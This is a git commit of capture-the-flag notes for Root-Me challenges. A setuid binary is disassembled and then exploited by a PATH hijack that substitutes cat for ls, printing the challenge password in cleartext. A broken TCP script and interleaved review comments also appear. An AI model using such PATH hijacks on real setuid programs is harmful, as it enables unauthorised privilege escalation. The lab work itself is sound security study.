commit a412c6432efabcad4c5a701eb2a986e7928495ee
Author: Tuan-Dat Tran
Date: Sat Mar 21 12:44:26 2026 +0100
init
Signed-off-by: Tuan-Dat Tran
diff --git a/app/bash-system-1/notes.org b/app/bash-system-1/notes.org
new file mode 100644
index 0000000..7105ab2
--- /dev/null
+++ b/app/bash-system-1/notes.org
@@ -0,0 +1,91 @@
+* Bash - System 1
+
+Challenge: https://www.root-me.org/de/Herausforderungen/App-Script/ELF32-System-1
+
+Aufgabe
+Quellcode:
+#+begin_src C
+ #include
+ #include
+ #include
+
+ int main(void)
+ {
+ setreuid(geteuid(), geteuid());
+ system("ls /challenge/app-script/ch11/.passwd");
+ return 0;
+ }
+#+end_src
+
+Télécharger
+Zugangsdaten für die Übung:
+#+begin_quote
+Host challenge02.root-me.org
+Protokoll SSH
+Port 2222
+Zugang per SSH ssh -p 2222 app-script-ch11@challenge02.root-me.org
+Benutzername app-script-ch11
+Passwort app-script-ch11
+#+end_quote
+
+---
+
+On the system is a ch11 binary which is the compiled version of the above program
+Opening the compiled program in r2 we can see
+
+#+begin_src asm
+$ r2 r ./ch11
+[0x0000058d]> aaaa
+[0x0000058d]> afl
+[0x0000058d]> s main
+[0x0000058d]> pdf
+/ 89: int main (char **argv);
+| ; var int32_t var_ch @ ebp-0xc
+| ; arg char **argv @ esp+0x34
+| 0x0000058d 8d4c2404 lea ecx, [argv]
+| 0x00000591 83e4f0 and esp, 0xfffffff0
+| 0x00000594 ff71fc push dword [ecx - 4]
+| 0x00000597 55 push ebp
+| 0x00000598 89e5 mov ebp, esp
+| 0x0000059a 56 push esi
+| 0x0000059b 53 push ebx
+| 0x0000059c 51 push ecx
+| 0x0000059d 83ec0c sub esp, 0xc
+| 0x000005a0 e8ebfeffff call sym.__x86.get_pc_thunk.bx
+| 0x000005a5 81c32b1a0000 add ebx, 0x1a2b
+| 0x000005ab e850feffff call sym.imp.geteuid ; uid_t geteuid(void)
+| 0x000005b0 89c6 mov esi, eax
+| 0x000005b2 e849feffff call sym.imp.geteuid ; uid_t geteuid(void)
+| 0x000005b7 83ec08 sub esp, 8
+| 0x000005ba 56 push esi
+| 0x000005bb 50 push eax
+| 0x000005bc e85ffeffff call sym.imp.setreuid
+| 0x000005c1 83c410 add esp, 0x10
+| 0x000005c4 83ec0c sub esp, 0xc
+| 0x000005c7 8d83a0e6ffff lea eax, [ebx - 0x1960]
+| 0x000005cd 50 push eax ; const char *string
+| 0x000005ce e83dfeffff call sym.imp.system ; int system(const char *string)
+| 0x000005d3 83c410 add esp, 0x10
+| 0x000005d6 b800000000 mov eax, 0
+| 0x000005db 8d65f4 lea esp, [var_ch]
+| 0x000005de 59 pop ecx
+| 0x000005df 5b pop ebx
+| 0x000005e0 5e pop esi
+| 0x000005e1 5d pop ebp
+| 0x000005e2 8d61fc lea esp, [ecx - 4]
+\ 0x000005e5 c3 ret
+#+end_src
+
+---
+
+
+#+begin_src sh
+app-script-ch11@challenge02:~$ cp /bin/cat /tmp/ls
+app-script-ch11@challenge02:~$ ll /tmp/
+ls: cannot open directory '/tmp/': Permission denied
+app-script-ch11@challenge02:~$ ls -lah /tmp/
+ls: cannot open directory '/tmp/': Permission denied
+app-script-ch11@challenge02:~$ PATH="/tmp/"
+app-script-ch11@challenge02:~$ ./ch11
+!oPe96a/.s8d5
+#+end_src
diff --git a/programming/tcp-back-to-school/main.py b/programming/tcp-back-to-school/main.py
new file mode 100644
index 0000000..ea9f165
--- /dev/null
+++ b/programming/tcp-back-to-school/main.py
@@ -0,0 +1,28 @@
+import socket
+from threading import Thread
+
+
+serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+host = "challenge01.root-me.org"
+port = 52002
+serversocket.bind((host, port))
+
+
+class client(Thread):
+ def __init__(self, socket, address):
+ Thread.__init__(self)
+ self.sock = socket
+ self.addr = address
+ self.start()
+
+ def run(self):
+ while 1:
+ print("Client sent:", self.sock.recv(1024).decode())
+ self.sock.send(b"Oi you sent something to me")
+
+
+serversocket.listen(5)
+print("server started and listening")
+while 1:
+ clientsocket, address = serversocket.accept()
+ client(clientsocket, address)
diff --git a/programming/tcp-back-to-school/notes.org b/programming/tcp-back-to-school/notes.org
new file mode 100644
index 0000000..7890251
--- /dev/null
+++ b/programming/tcp-back-to-school/notes.org
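Review bot: The shell transcript that closes app/bash-system-1/notes.org commits the recovered challenge password in cleartext (the output line after `./ch11`); replace it with a placeholder such as `<flag redacted>` before this enters shared history. The notes also jump from the disassembly to the transcript without stating the root cause: `system("ls /challenge/app-script/ch11/.passwd")` hands a bare command name to the shell, so `ls` is resolved through the caller-controlled PATH after `setreuid(geteuid(), geteuid())` has made the elevated uid the real one. A closing remark on the program-side fix would complete the write-up, for example `execl("/bin/ls", "ls", "/challenge/app-script/ch11/.passwd", (char *)NULL);`, or at minimum an absolute path plus a reset environment.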
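Review bot: `serversocket.bind((host, port))` in programming/tcp-back-to-school/main.py sets up a listening socket on challenge01.root-me.org, but the task quoted in the accompanying notes.org asks for a client that connects to that host, and binding to an address that is not local will normally fail at start-up. Replace the bind/listen/accept scaffold with a connection such as `sock = socket.create_connection((host, port), timeout=2)`, then read the prompt and send the answer on that socket. If the server loop is kept for local testing, `run` should stop on an empty read (`data = self.sock.recv(1024)` followed by `if not data: break`) and close the socket, because as written the loop keeps going after the peer has closed. The `socket` parameter of `__init__` also shadows the imported module; `conn` would avoid that.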
@@ -0,0 +1,55 @@
+* TCP - BAck to School
+
+Challenge: https://www.root-me.org/de/Herausforderungen/Programmierung/TCP-Back-to-school
+
+Aufgabe
+
+Um diesen Test mit dem TCP-Protokoll zu starten, müssen Sie eine Verbindung zu einem Programm an einem Netzwerk-Socket herstellen.
+
+- Berechne die Quadratwurzel aus Nummer 1 und multipliziere sie mit Nummer 2.
+- Runden Sie dann das Ergebnis auf zwei Dezimalstellen ab.
+- Sie haben 2 Sekunden Zeit, um die richtige Antwort zu senden, sobald das Programm Ihnen die Berechnung sendet.
+
+Zugangsdaten für die Übung
+
+Host challenge01.root-me.org
+Protokoll TCP
+Port 52002
+
+---------
+
+#+begin_src sh :results output
+cat ./main.py
+#+end_src
+
+#+RESULTS:
+#+begin_example
+import socket
+from threading import Thread
+
+
+serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+host = "challenge01.root-me.org"
+port = 52002
+serversocket.bind((host, port))
+
+
+class client(Thread):
+ def __init__(self, socket, address):
+ Thread.__init__(self)
+ self.sock = socket
+ self.addr = address
+ self.start()
+
+ def run(self):
+ while 1:
+ print("Client sent:", self.sock.recv(1024).decode())
+ self.sock.send(b"Oi you sent something to me")
+
+
+serversocket.listen(5)
+print("server started and listening")
+while 1:
+ clientsocket, address = serversocket.accept()
+ client(clientsocket, address)
+#+end_example